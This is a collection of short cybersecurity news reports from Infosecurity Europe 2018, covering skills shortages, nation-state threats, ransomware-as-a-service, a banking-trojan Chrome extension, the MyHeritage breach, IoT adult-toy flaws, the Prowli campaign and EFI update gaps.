A persistent industry PR problem and over-prescriptive employer demands continue to frustrate efforts to close cyber-skills shortages, according to James Lyne.
“I’ve spoken to many people coming out of competitions saying ‘I didn’t realize there was a job in cybersecurity’ – so clearly there’s an advertising problem,” he argued.
Lyne also claimed that highly talented young cybersecurity enthusiasts find themselves presented with a huge barrier “to get onto the ladder of improvement” thanks to excessive demands from employers for professionals with several years’ experience.
“These are ridiculous problems in the face of industry skills gaps,” he argued.
Lyne explained how he ended up in cybersecurity via a circuitous and somewhat fortuitous route, claiming he may even have been tempted down a darker path had things worked out differently.
“I had a lot of online mentors at the time who I’ve never met who were hugely influential for me,” he said. “I think the biggest issue is showing people that there are good jobs here. At the moment it’s easier to offer anonymous hacking services on the dark web.”
Although Lyne admitted his career has been “filled with lucky interventions,” he’s working hard to ensure the next generation of cyber-enthusiasts don’t have to rely on luck to carve out a successful future in the industry.
He bemoaned the lack of focus in learning on understanding how things work, claiming modern tech professionals perhaps rely too much on off-the-shelf tools.
“We need to rebuild that ‘rip it apart’ culture,” said Lyne. “The level of understanding of how tech works has dropped off a cliff. Technology is just so usable out of the box.”
The government’s CyberFirst scheme, which Lyne was instrumental in developing, aims to achieve this by using gamification techniques to encourage more kids into the industry.
The former director general of GCHQ Robert Hannigan took to the keynote stage at Infosecurity Europe 2018 to discuss the evolving cyber-threat landscape, describing how – whilst changes in sophistication of lone actors and cyber-criminals are increasing the challenges of keeping data secure – it is the rise of nation state attacks that is “possibly the biggest change in the last couple of years.”
Hannigan said that risks surrounding nation state attacks have always been an area of concern to some extent, but recent changes in political intent have made them a real and significant issue in today’s landscape.
He pointed to activities in Iran and Russia as examples. “Iran have taken a very collaborated approach to cyber-activity, most publically through the DDoS attacks on banks a few years ago” Hannigan said, whilst at the higher end of sophistication, Russia have put a lot of investment into cyber-activity in the last 10 years.
“The biggest change [with Russia] is intent; the kind of prepositioning of a cyber-attack could go all sorts of ways,” he explained, “but if your geopolitical intent changes and you want to take risks and you don’t mind being found out and want to be destructive, that suddenly becomes very dangerous. I think that is what has changed for the West, not just online but in other areas in the last few years with Russia.
“The fact that both the US and UK governments have been talking about finding Russia on utility energy company networks and the infrastructure of the internet is really important and worrying, because of the intent.”
Nation state activities are increasingly becoming more sophisticated and more brazen, Hannigan added, and the real concern when it comes to nation state attacks is that the “risk of miscalculation could be huge."
“We haven’t yet seen anybody killed or seriously injured as a result of a cyber-attack, but if you start to tamper with industrial control systems, with health networks, it feels like it’s only a matter of time before somebody gets hurt and ultimately killed,” he said.
However, to conclude, Hannigan pointed out that 80% to 90% of cyber-attacks, regardless of their sophistication level, can be prevented or mitigated by doing the basics right.
“We should keep doing the basics,” he added, “and at a national level I’m really delighted with the progress the NCSC has made with active cyber-defense.”
A cultural and technological clash between IT and OT is hindering organizations’ efforts to mitigate the risk of serious cyber-physical attacks, according to Trend Micro.
The security giant’s VP of infrastructure strategies, Bill Malik, explained to Infosecurity Europe attendees that the fundamental goal of OT teams is to “ensure everything is safe and reliable.”
When it comes to information security teams, however, it’s all about ensuring data is not “lost, altered or disclosed.”
“These goals are out of mind for people running OT systems, so when you try to converge the two you end up with major conflict,” said Malik.
Where OT teams try to fix an issue as quickly as possible in order to preserve the integrity of the service, IT security teams want to find out what went wrong to prevent it happening again, he added.
“When you have people with expertise in their own domains working together, it results in a kind of ‘ritual combat’,” said Malik. “The biggest challenge is integrating their viewpoints.”
Another example of the disparity between the two ways of approaching cybersecurity is the DevOps concept of “fail fast and fix fast.”
“Let me tell you: 'fail fast' doesn’t work when you’re fixing a connected car, or a robotic surgery,” warned Malik.
The job of security managers is complicated further by the mass of different protocols used in the IoT world to enable communication between devices and controllers.
In healthcare, these challenges are compounded by the fact that medical devices in the US take 2-5 years to get certified, but if the software is upgraded they risk losing that certification. This means out-of-date and insecure platforms like Windows XP are not uncommon, warned Malik.
“Whether we’re talking about a power station, a hospital or your Alexa at home we need to be able to identify all vulnerable devices, ensure they’re properly segmented and know what activity is going on,” concluded Malik.
He added that organizations need to upgrade where possible to ensure devices are as secure as they can be, and to support modern, secure IoT architectures, as well as plan for regulatory mandates.
Europe’s new NIS Directive should go some way to helping improve the resilience of “essential services” providers to cyber-physical attacks, by raising baseline security standards. In the UK it applies to transport, energy, healthcare, water and other CNI sectors.
A third of global business decision makers said they’d rather cut costs by paying a ransomware demand than invest in security, according to NTT Security.
The managed security giant polled 1800 business leaders around the world to compile its Risk:Value 2018 report.
Worryingly it revealed that only around half of businesses are prepared to invest proactively in cybersecurity.
Most of them are doing so to prevent the damage to customer confidence (56%), and brand and reputation (52%) that can result from a breach.
Even more concerning is the fact that nearly half (47%) of respondents said they’d not been affected by a data breach, despite less than half (48%) claiming they had secured all their critical data. In the UK, nearly a quarter (22%) don’t even know if they have suffered a breach or not.
“We’re seeing almost unprecedented levels of confidence among our respondents to this year’s report, with almost half claiming they have never experienced a data breach. Some might call it naivety and perhaps suggests that many decision makers within organizations are simply not close enough to the action and are looking at one of the most serious issues within business today with an idealistic rather than realistic view,” said NTT Security’s senior VP EMEA, Kai Grunwitz.
“This is reinforced by that worrying statistic that more than a third globally would rather pay a ransom demand than invest in their cybersecurity, especially given the big hike in ransomware detections and headline-grabbing incidents like WannaCry. While it’s encouraging that many organizations are prepared to take a long-term, proactive stance, there are still signs that many are still prepared to take a short-term, reactive approach to security in order to drive down costs.”
The estimated cost to recover from an incident has increased from $1.4m to $1.5m since last year. However, on the plus side, global respondents claimed it would take 57 days to recover from a breach, down from 74 days in 2017. In the UK the figure is lower still at 47 days.
After noticing a browser extension communicating with a suspicious domain, researchers analyzed the Google Chrome extension named Desbloquear Conteudo (unblock content) and found that it was a rare banker malware.
The extension, identified as HEUR:Trojan-Banker.Script.Generic has been removed from Chrome Web Store. According to Vyacheslav Bogdanov, researcher, Kaspersky Lab the man-in-the-middle (MitM) extension for Chrome was targeting users of Brazilian online banking services with the goal of collecting user logins and passwords in order to pilfer their savings.
MitM attacks redirect the victim’s web traffic to a spoof website. While the target is under the impression they are connected to a legitimate site, the flow of traffic to and from the real bank site is actually being redirected through an attacker's site so that the criminal can harvest the personal data they are after.
What's interesting about this particular extension is that the developers made no effort to obfuscate its source code. Instead, they opted for a MitM attack using "the WebSocket protocol for data communication, making it possible to exchange messages with the C&C [command-and-control] server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank."
Because the malware was targeting Brazilian users, Bogdanov suggested that the browser extension had the additional function of adding cryptocurrency mining scripts to the banking sites users visited.
“Browser extensions aimed at stealing logins and passwords are quite rare in comparison to adware extensions, but given the possible damage that they can cause, it is worth taking them seriously. We recommend choosing proven extensions that have a large number of installations and reviews in the Chrome Web Store or other official services. After all, despite the protection measures taken by the owners of such services, malicious extensions can still penetrate them,” Bogdanov said.
Israeli genealogy site MyHeritage has revealed details of a breach affecting over 92 million users.
The DNA testing service claimed in a statement on Monday that a security researcher contacted its CISO after finding a file containing the data on a private server outside of the company.
The details contained “all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”
The firm claimed that there’s no evidence the data has been used by the hackers or that any other MyHeritage systems, such as those containing card information or DNA data, were compromised.
“Immediately upon receipt of the file, MyHeritage’s Information Security Team analyzed the file and began an investigation to determine how its contents were obtained and to identify any potential exploitation of the MyHeritage system,” the statement continued.
“We determined that the file was legitimate and included the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach. MyHeritage does not store user passwords, but rather a one-way hash of each password, in which the hash key differs for each customer. This means that anyone gaining access to the hashed passwords does not have the actual passwords.”
The firm has acted swiftly to set up an incident response team and an independent forensic review and said it will be rolling out 2FA to users soon. There’s also a 24/7 security customer support team on hand to answer any questions.
In the meantime, it urged users to change their passwords.
Commentators were broadly sympathetic to MyHeritage, claiming it did most of the security basics right.
“This breach of MyHeritage seems to be the rare instance in which a company in possession of sensitive data adhered to some of the best practices in password posture by not storing them in plain text but as one-way hashes,” said Balbix CEO, Gaurav Banga. It’s unfortunate that user email addresses were exposed, but by partitioning servers, using third parties for payment processing and encrypting passwords, MyHeritage has — at least so far — minimized the damage of this breach.”
Common vulnerabilities in IoT devices are especially prevalent in adult toys too.
Speaking on “Hacking Adult Toys” at Infosecurity Europe, Ken Munro from Pen Test Partners looked at a number of adult devices, some of which had basic authentication levels, static ID which enabled them to be controlled remotely and open ports for identification.
Munro highlighted some toys which were paired for multiple user sessions, while the Lovense vibrator has a standard Bluetooth PIN of 0000 and can be controlled by an Android app which stores, and never deletes, temporary image files.
Referring to research by Alberto Segura, Munro said that the Chrome plug-in for the toy which could identify a user as an online camera model simply by identifying by the email address.
In another case, a male toy could be controlled by Bluetooth, and inflate the inside of the toy remotely. Another toy’s mobile app “continuously probes for outbound connections” and if a user has connected this to a work phone, the person’s IT department will face multiple alerts. “By using this device you’re effectively telling your employer that you’re a cam model,” Munro said.
In other cases, Munro showed a Fleshlight toy that has a static link that never changes, while butt plugs can be gelocated and controlled via Bluetooth.
Munro demonstrated that code from a camera drone was used in a sex toy with a camera, and with a static IP address “admin” as the username, meaning it could stream video in real time “completely unprotected.”
In terms of disclosure, Munro said that a number of emails had been sent to manufacturers, but they had received no response.
“We have pushed hard for manufacturers to improve security, and porn is big business and we were shocked at the state of adult toys,” he said. “Vulnerabilities we knew about ten years ago are being sold to people and used in intimate situations.”
He concluded by naming Brad Render for his work in disclosure to adult toy manufacturers, and encouraged delegates to start making manufacturers listen “to get their security sorted” as SSL is not in place, there is pinning and pairing and no encryption used,” and the firmware is a train wreck - so do have a play and see security flaws and tell us and get them fixed.”
Researchers have discovered a traffic manipulation and cryptocurrency mining campaign infecting organizations across industries from finance to education and government. The Operation Prowli campaign has been spreading malware and malicious code to servers and websites around the world, and more than 40,000 machines reportedly have been infected.
The GuardiCore Labs team found that by using exploits, password-brute-force and weak configurations attackers have had widespread success with the Prowli campaign. Targeting a variety of platforms from CMS servers hosting popular websites to backup servers running HP Data Protector and DSL modems, the multipurpose operation also goes after IoT devices.
Relying on digital currencies and traffic redirection, the campaign has already victimized more than 9,000 companies. Traffic monetization frauds are trending on the internet where attackers leverage tech support scams and promote fake websites to lure unsuspecting users away from their legitimate websites. They are then redirected to a fake site where they fall prey to clicking on malicious browser extensions.
First identified on 4 April, a group of secure-shell (SSH) attacks were discovered communicating with a command-and-control (C&C) server. "The attacks all behaved in the same fashion, communicating with the same C&C server to download a number of attack tools named r2r2 along with a cryptocurrency miner," GuardiCore wrote.
The researchers were able to trace the campaign around the world across several networks and found the campaign associated with different industries. "Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations. These attacks led us to investigate the attackers’ infrastructure and discover a wide ranging operation attacking multiple services."
The financially motivated attackers appeared to be targeting indiscriminately and went after domains that exposed a wide range of services to the internet. “Prowli exploits known vulnerabilities across WordPress, Joomla!, SMB, and even some DSL modems, so automated patching, along with continuous assessment and remediation, is critical to avoid these types of attacks," said Brajesh Goyal, CP of engineering, Cavirin.
These types of crypto-jacking attacks are escalating, said Dan Hubbard, chief security architect at Lacework. "Attackers are also utilizing everything from mobile devices to taking over accounts in large-scale public cloud computing environments in order to launch specific high-performance GPU workload types."
Examining network traffic will help users discover whether they've been infected. GuardiCore also advised that segmentation is a good practice, as is routinely reviewing who and what can access the servers. "Keep this list to a minimum and pay special attention to IoT devices whose credentials cannot be changed. Monitoring connections would easily show compromised devices communicating with cryptocurrency mining pools."
At Infosecurity Europe 2018 security researcher James Lyne explored some of the latest tactics and techniques currently being deployed by cyber-criminals, with particular focus on how 2018 has seen the continued evolution of ransomware to become even more commoditized and business-like.
“I almost feel boring standing here talking about ransomware, as we must all be sick of the topic by now,” he said, “but there’s some quite interesting commercial and business model stuff happening.”
We’re all pretty comfortable with the effectiveness of ransomware, he added, and the fact that it is going to continue to be a part of the ongoing threat. “It’s brilliance is it’s ubiquitous applicability to all of us – stealing credit cards, targeting specific data, going after usernames and passwords, and ransomware struck on the gold of a model where they [attackers] don’t need to care about what data you have, just that you care about your data.
“Since January, there’s been a series of campaigns that are worth paying attention to,” he said. "They are ransomware-as-a service campaigns offering some interesting new features."
An example Lyne pointed to was a “web-based interface where you can set some options, customize the ransom price, the address and so on, click build and download and get delivered a nice, constructed up-to-date piece of malware that authors have put effort into making sure the security community isn’t going to detect.”
They’ve even started giving security advice: “we recommend you to download the file without the xe extension so you don’t accidently run it!”
Another new ransomware service Lyne highlighted is one that is “free for download and use – so we have ‘fremium ransomware’ – who wants to pay for a service in 2018? You login, generate your malicious code and you distribute it, but the difference is, unlike the products and services of before where you owned the ransomware, it’s now an advertising referral scheme. So you generate your malware, you distribute it, and this other criminal gang receives the money and pays you 40% of the profits – so there’s no upfront investment, no difficulties in dealing with the digital currency and potentially getting caught, you don’t even own the people you hack anymore! That’s how commoditized we are – people have options on referral cuts on compromising our computers.”
IT leaders are prioritizing improvements in cybersecurity at a growing rate in an effort to fight cybercrime threats and become GDPR compliant, reports the Harvey Nash/KPMG CIO Survey 2018.
More than one-third of organizations surveyed in April reported that they did not expect to be compliant by the recent GDPR deadline, though 68% report that they have the support needed from their boards to ramp up investments to bring them into compliance.
“The seemingly inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for board-level discussions,” Akhilesh Tuteja, global cyber security services co-leader, KPMG International, said in a press release.
“Protecting the business from a cyber attack has jumped further up the boardroom agenda than any other item and IT leaders are being encouraged to make their defences the best that they can be,” Tuteja said.
David Ferbrache OBE, chief technology officer in KPMG's cybersecurity practice, said that data privacy and cybersecurity are closely intertwined. "With the introduction of the GDPR, privacy has become very much a front line issue. It was no surprise to see that 38% of survey respondents said they would ‘still be on the journey’ at the GDPR start date and only 15% said their compliance programme would be ‘complete’. "
Less than a quarter (22%) of respondents stated that they are in a good position to respond to a cyber-attack despite the overwhelming number of IT leaders (77%) whose greatest concern is the threat of organized cybercrime.
In addition, many organizations are in the nascent stages of their digital strategies, with most digital investment focused on the front end rather than on operational activities. According to the survey, 78% of CIOs believe their digital strategy is – at best – moderately effective, with only 32% of organizations reporting to have an enterprise-wide digital strategy.
Those organizations that have a dedicated chief digital officer (CDO) are more than twice as likely to have an all-encompassing digital strategy. "The incessant rise of shadow IT, the explosive growth of the CDO and the changing nature of technology have removed many of the certainties that have fueled the importance of the CIO role," Ferbrache said.
A relatively new role, the CDO is responsible for driving the value of digital in a business across technology and operations. "It has less legacy and baggage than more traditional roles like the CIO, although many CIOs would argue that they are CDOs in everything but job title."
Half of all IT leaders now report having either a dedicated or acting CDO, but Ferbrache noted that 40% of organizations do not have a CDO and did not indicate plans to establish such a role. "The size of the IT budget is directly proportional to the likelihood of having a dedicated CDO, with larger organisations much more likely to have one."
The introduction of AI and machine learning should not mean a decision of man or machine, but one of man and machine bringing combined skills together.
Speaking at Infosecurity Europe 2018, Christopher Morales, head of security analytics at Vectra Networks, looked at 'Building Security That Works, Machine Learning Fundamentals for Cybersecurity Professionals' admitted that there is confusion around what AI, machine learning and deep learning are.
“AI is the output of what you’re trying to do, and do things that is a repetitive task,” he said. “Machine learning is the method and the means to AI, but it is not AI itself.”
Morales went on to say that deep learning is part of machine learning, and there are two types: supervised or unsupervised. Supervised means it is task driven, “you give it input and have X data and you get Y output.” With unsupervised, he explained that you “have the X but no Y, a set of data and no outputs.”
Explaining unsupervised machine learning, Morales said that as conference delegates “we’ve been clustered by a vendor."
He went to address algorithms, saying that if you have a single algorithm and you’re using it to do a job, that is not really AI, that is about using the right tool for the job. “Look at the task and who administrates the system, and if you want to find a remote access trojan, that is a good use of supervised learning as you are being specific on what you are looking for and how to apply it,” he said.
Moving on to how this can help with security, Morales said that pattern matching has been done for years, and users have focused on understanding what malware is, and with machine learning you can focus on what it does rather than what it is – and match it to that decision.
“Focus on behavior and how it relates to an attack, and focus on what to do and what it is doing to you now.”
He went on to encourage users to train systems on a subset of tools and what it looks like when an attacker wants to get on your network, and apply it to the network so it looks for any tool doing the same behavior.
“Unsupervised learning is good at learning local context and what people do, and in this case security research on what an attacker actually does,” he said.
He concluded by saying that the real value of AI is in replicating human tasks, but what you get out is to reduce the workload of the human. “We need to realize that machines are not going to replace humans, and in most instances they increase the human‘s work,” he said.
“But in security machines and humans are inherently different: machines are good at memorizing data and repetitive tasks and do it fast in multiple tasks, and humans are good at being creative and looking at context. It is not man or machine, but a combination of machines doing tedious work so humans can focus on creative work.”
Internet stakeholders should worry less about the problems created by Silicon Valley and focus more on the increasingly dystopic online world being developed in Russia, China, Iran and elsewhere, according to Baroness Martha Lane Fox.
The Lastminute.com founder and cross-bench peer told attendees on day two of Infosecurity Europe of her concerns about Russian attempts to destabilize Western democracies and China’s controversial social credit system.
The latter seeks to give citizens points according to their behavior on- and offline, and restrict their lifestyles if scores fall below a certain level.
“We’ve become a bit obsessed with the West [when] we should be looking East,” she argued.
“We could easily put ourselves into a dystopian future in our heads … but we have it in our gift to own the future.”
To ensure the UK does so, work is needed to effect change at three levels: among lawmakers, individuals and corporations, Lane Fox claimed.
There is a particular challenge in changing the mindset of legislators from the current stance: “that no politician is going to lose votes by being negative about technology.”
“We need to upskill our legislators dramatically if we’re going to face the challenges of the coming years,” said Lane Fox.
However, politicians and civil servants were upskilled in this way during the creation of the Government Digital Service and gov.uk initiative, so it is possible, she added.
It will also be challenging to educate individuals about all things digital. Although 50% of respondents to a recent poll conducted by her new company Doteveryone claimed tech has helped them at an individual level, just 12% believe it helps society overall.
Key to the UK’s resilience in a post-Brexit world will be its ability not just to grow the digital economy, but to “flip the switch” and build a society enabled by technology – driving improvements in schools, transport, local government and more.
“We don’t have any option [post-Brexit] but to become the most modern digital nation we can be,” said Lane Fox.
However, in order to do so, the UK will have to tackle a profound technical skills deficit, she added.
Speaking in the keynote session 'Rethinking Security Teams to Address the Skills Shortage & Secure the Business' at Infosecurity Europe 2018, panelists were united in agreement about having a blend of talent and diversity to build the best team.
Cory Scott, CISO of LinkedIn, said that if you only employ “tricksters” nothing will get fixed, and that is why you need to look for all types “and why diversity and narrative should be in your mindset, if you they look like you and all have the same background and education you end up with a homogenous group of individuals who are not serving the business.”
Scott added that you want a collection of people with different narratives and different types of functions, but that “trickster” narrative was also important to understand how the next attack pivots, and you want an engineering wizard to solve problems at scale and not just do a manual review time and time again.
Christian Toon, CISO of Pinsent Masons, likened the building of a security team to Marvel’s Avengers where there are participants with different skills and backgrounds. He said: “There is not a skills gap, there is an attitude gap and that is why you hire.”
In terms of internal development, Toon encouraged delegates to consider “giving people a career, a job and then give them something else” like training and education opportunities.
“People want to grow and develop, and give them training and meaningful qualifications that enhance your security team and treat them as individuals,” he said. “Look at every walk of life, every gender and you need to tell HR need to positively discriminate.”
A question from moderator Wesley Simpson, chief operating officer, (ISC)2, pointed out that women only make up 8% of most security teams, and only 7% are women under 29, so what is being done to cast the net wider?
Toon recommended looking at incentivizing those looking for a career change and encouraging those only able to take on part time roles, while Scott said that there are three areas to consider:
Having an inclusive and supportive culture, where you listen to your employees and understand how to measure culture.
The second is about hiring and getting the right type of candidates and an “unconscious bias” in organizations who don’t understand your message.
The third is about establishing ability with a wide group and focusing on the development of the organization.
Closing with a discussion on the role of recruitment agents, Toon said that he finds “recruiters difficult to deal with, and the right ones are worth their weight in gold.”
Mun Valiji, CISO of Sainsbury's, said that there is too much time spent trying to get “a CV match” and not enough spent on getting the recruitment agent to understand requirements that the company is trying to fulfill and understand the business and engagements.
Emma Smith, group technology security director at Vodafone, argued that the more the recruitment company knows about the business the better the match. “We make sure every role goes through the gender language tool” and that recruiters can help with that, and make sure that the recruitment process is a personal task.
The European Security Blogger Award winners have been announced.
Following on from the last awards, held in 2016, the shortlist saw some of the leading names in cybersecurity commended.
Nominated and voted for by the public, with votes added by judges including Infosecurity Europe Hall of Fame members Jack Daniel and Brian Honan, security blogger and AlienVault advocate Javvad Malik, Infosecurity Magazine contributing editor Dan Raywood and Yvonne Eskenzi from Eskenzi PR, the awards were presented at the Blogger Awards meet-up in a reception held in London.
The winners were announced as the following:
- Best Corporate Security Blog = ESET We Live Security
- Best European Corporate Security Blog = Digital Shadows
- Best European Security Podcast = Jenny Radcliffe, The Human Factor
- Best Security Podcast = Smashing Security - Graham Cluley
- Best Security Video Blog = Sophos Security
- Best European Personal Security Blog = Leigh Anne Galloway
- Most Entertaining Blog = Javvad Malik
- Most Educational Blog = Scott Helme
- Best New Security Blog = Hacker Not Found
- Best EU Security Tweeter = Kevin Beaumont
- Grand Prix Prize for the Best Overall Security Blog = Troy Hunt
The first step is assessing “what your organization looks like on paper, and knowing about your organization in terms of the sector, the size, the geography – what are the most important information assets, which are the biggest threats and what would be the most damaging thing that could happen to the organization.”
Once you have that understanding of the baseline characteristics of the organization on paper, you can move onto “understanding them in real life,” Dr Barker said, and the key thing that must be done here is speaking to people within the organization “to find out what is actually happening, because as we know, what is happening day-to-day among the employees of an organization will be a very different picture to what you see on paper.”
Dr Barker added that a good level of security awareness does not always equate to good security understanding and changes in behavior, “so when we talk about awareness we need to think about what the outcome is that we want – we don’t want people to be aware just for the sake of it, we want to see changed behaviors.”
Her advice for doing that is to “work backwards” to create a culture in which people are engaged through experiences of what good security behavior is, and making “cybersecurity personal is one of the best ways to get through to people.
“If you really want to change behaviors,” she concluded, “you need to think about intrinsic motivation and what you can do that is really going to tap into their [users’] internal rewards system.”
Speaking at Infosecurity Europe 2018 founder of The Analogies Project Bruce Hallas discussed user behavior, highlighting a common assumption about the subject and explaining why it is a flawed logic that should be reconsidered.
That assumption is that people are logical thinkers, and process information rationally and make decisions which appear to be sensible. In fact, Hallas explained, users are irrational and make many behavioral decisions which are affected by cognitive biases, and that must be taken into account when you are trying to influence better security behaviors and design security awareness training.
“The bad news is that people are people and they aren’t that logical at the end of the day,” he added. By embracing that approach it can be concluded that people are actually becoming predictably irrational, thanks to more than 150 cognitive biases.
Examples of the cognitive biases Hallas pointed to include: loss aversion, whereby “we feel more what we lose than what we gain,” status quo bias which suggests users “don’t like change” unless it is their idea, social influences and the “IKEA effect” where “we tend to value things we have developed more than other people.”
“Research has shown that you can make really, really small tweaks to what you are already doing” to see effective behavioral returns, Hallas concluded, but to do that “you’ve got to get to grips with cognitive biases.”
When it comes to cybersecurity practices of consumers, a new report shows that Florida ranks as the riskiest state with most residents lagging behind in their awareness of online safety practices.
The Cyber Hygiene Index: Measuring the Riskiest States, conducted by Ponemon Institute and commissioned by Webroot, surveyed more than 4,000 consumers across all 50 states and Washington, D.C., and found that New Hampshire scored the highest. In contrast, Florida came in dead last, reflecting that most residents are not ready to prevent, detect or respond to cyber-related attacks such as malware, phishing, ransomware and identity/credential theft.
Wyoming and Montana were just above Florida, an indication that despite high profile breaches such as Equifax, individuals across the US lack cybersecurity education. The spectrum is wide, though, and at the other end, individuals residing in New Hampshire, Massachusetts and Utah have the safest online habits.
Only 24% of Americans are aware of the best practices that will increase online security, such as regularly monitoring bank and credit card statements and understanding how to block pop-ups, updating online account passwords, and taking precautions before clicking on an email. Additionally, only half of Americans use antivirus or other internet security software on their laptops, desktops or smartphones.
Nearly two-thirds (72%) of survey respondents living in Florida reported that they share passwords or other access credentials with others, while more than half (53%) of New Hampshire residents claimed that they never share passwords with others.
Interestingly, the number of devices an individual owns is a greater indicator of their cyber-risk than is their age. The survey results found that the more devices an individual owns, the lower their level of cyber-hygiene. In fact, 75% of respondents 30 and under reportedly engage in riskier online behaviors than older respondents.
“Regardless of the region, the riskiest states index shows that many people in the US are jeopardizing their safety with inadequate cybersecurity practices. To help fight widespread threats like ransomware and phishing attacks, internet users should run a security solution on their personal devices and make sure that all security and other software applications are up to date,” said David Dufour, vice president of engineering and cybersecurity, Webroot.
Security experts have warned that Extensible Firmware Interface (EFI) updates often lack transparency, and fail to cover all hardware models and software versions, leading to dangerous gaps in protection.
Duo Labs director, Rich Smith, told attendees at Infosecurity Europe today that securing the EFI layer is particularly important as its position in a computing system means compromise could give hackers the upper hand in terms of stealth, persistence and access to anything above it.
Although efforts to compromise EFI are most often carried out as part of highly targeted attacks, they remain a major threat to organizations, he warned.
Smith revealed newly updated research from Duo Security which details shortcomings in Apple’s EFI update processes.
Drawing on data collected from 73,000 customer machines, the findings show that 4.2% were running the wrong EFI version – much higher than the 1% or so expected.
That rose to nearly 43% for the oldest Mac model on the market, dating back to 2015.
The results also showed that organizations could be “software secure but firmware vulnerable.”
For the latest Mac update, 10.12.6, the researchers found 43 EFI bundles issued. This figure dropped to 31 for Mac version 10.11 and just one for the previous version, 10.10.
“This makes it difficult for administrators to do good rigorous analysis across their fleets. It’s difficult to understand your threat profile and attack surface,” Smith claimed.
“The only way to ensure you’re getting the best firmware updates is ensuring your on the latest software version.”
He called on tech firms to introduce “the same degree” of transparency into the firmware update process as they do with software updates.
Duo Security chose to study Apple because the firm’s singular ecosystem made it easier to analyze, but Smith warned that failings in the Wintel space are arguably even more acute.
Though somewhat deterred by the major takedown of two popular underground marketplaces, cybercriminals have found alternative solutions that are growing more popular, according to new research from Digital Shadows.
A new report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, found that the cybercriminal community has only been slightly quieted by the Operation Bayonet takedown of AlphaBay and Hansa, which forced tens of thousands of vendors and buyers to find new places to conduct business. Mistrust and fear have contributed to the decline of centralized marketplaces, as has the significant cost factor involved in establishing a new market.
Rather than investing in new marketplaces, criminals are focusing their processes and procedures on improving marketplace security and trust in existing sites. These tactics include blockchain DNS, user vetting and site access restrictions, domain concealment, and migration to chat and peer-to-peer (P2P) networks.
Vetting and limiting the user base is an additional challenge for site operators, who need to ensure only reputable and genuine users have access, particularly since forum users are skeptical of each other, aware that law enforcement can be posing as sellers.
To confront the issues of trust, communities have created a forum life cycle, a process by which administrators can limit new users’ access to a forum through mechanisms such as posting limits and area access restrictions.
Moving away from the centralized marketplace in favor of a more diffuse model was trending even before Operation Bayonet, and criminals are now using Telegram to conduct transactions across decentralized markets and messaging networks.
"Over the last six months, the Digital Shadows analyst teams have detected over 5,000 Telegram links shared across criminal forums and dark web sites, of which 1,667 were invite links to new groups," the report said. These covered a range of services, including cashing out, carding and cryptocurrency fraud.
Rick Holland, CISO and VP of strategy at Digital Shadows, said, “The FBI takedown has for now made the dark web marketplace model less viable. As it stands, the marketplace model appears to be in decline, but it would be naive to assume that law enforcement efforts such as Operation Bayonet have drastically reduced cybercriminal risks to both businesses and consumers."
"Instead," he continued, "as recent developments have shown, cybercriminals have taken to incorporating new processes, technologies and communication methods to continue their operations. The barriers to entry have shifted upwards and criminals are more likely to be deceived by each other. However, cybercrime ‘will find a way.’”
Despite the awareness that they are dutybound to protect the sensitive information of their customers, banks continue to suffer data breaches as the result of human error, as was the case for the Commonwealth Bank of Australia (CBA). The Sydney Morning Herald reported that CBA breached the privacy of 10,000 customers by sending their data to the wrong email addresses.
After conducting an information security investigation, the bank learned that 651 internal emails were incorrectly sent to email addresses at the wrong domain from 2016 to 2017. The sender inadvertently omitted the ".au" on the end of the intended domain, cba.com.au.
In order to prevent these human errors, CBA purchased the domain name in April 2017; however, the investigation looked into events that would have occurred prior to the takeover when the domain was used by a US cybersecurity firm.
CBA revealed that the 651 emails were indeed sent during that time frame and contained the data of 10,000 customers. "An extensive and detailed investigation by CBA confirmed the contents of all 651 internal emails were automatically deleted by the cba.com domain owner's system, which only collected information on CBA sender and recipient email addresses and the subject of the email," the bank wrote in a 1 June 2018 statement.
The bank's investigation confirmed that no customer data was compromised as a result of the mistake, but it accepted responsibility and acknowledged that customers want to be informed about data security and privacy issues. To that end, the bank has started to notify affected customers.
In the aftermath of the EU's GDPR compliance deadline, this type of privacy breach will continue to get more scrutiny, especially as today's large banks and enterprises serve global clientele. The moral of the story, said Anthony James, CMO at CipherCloud, is that customer data must be carefully protected.
"Note that if the breach involved even the records of one European customer, then they would have also likely been subject to 72-hour notification requirement and extremely onerous provisions of the EU General Data Protection Regulation," James said. "New best practices require a deeper focus on data and threat protection, especially in support of challenging new compliance requirements.”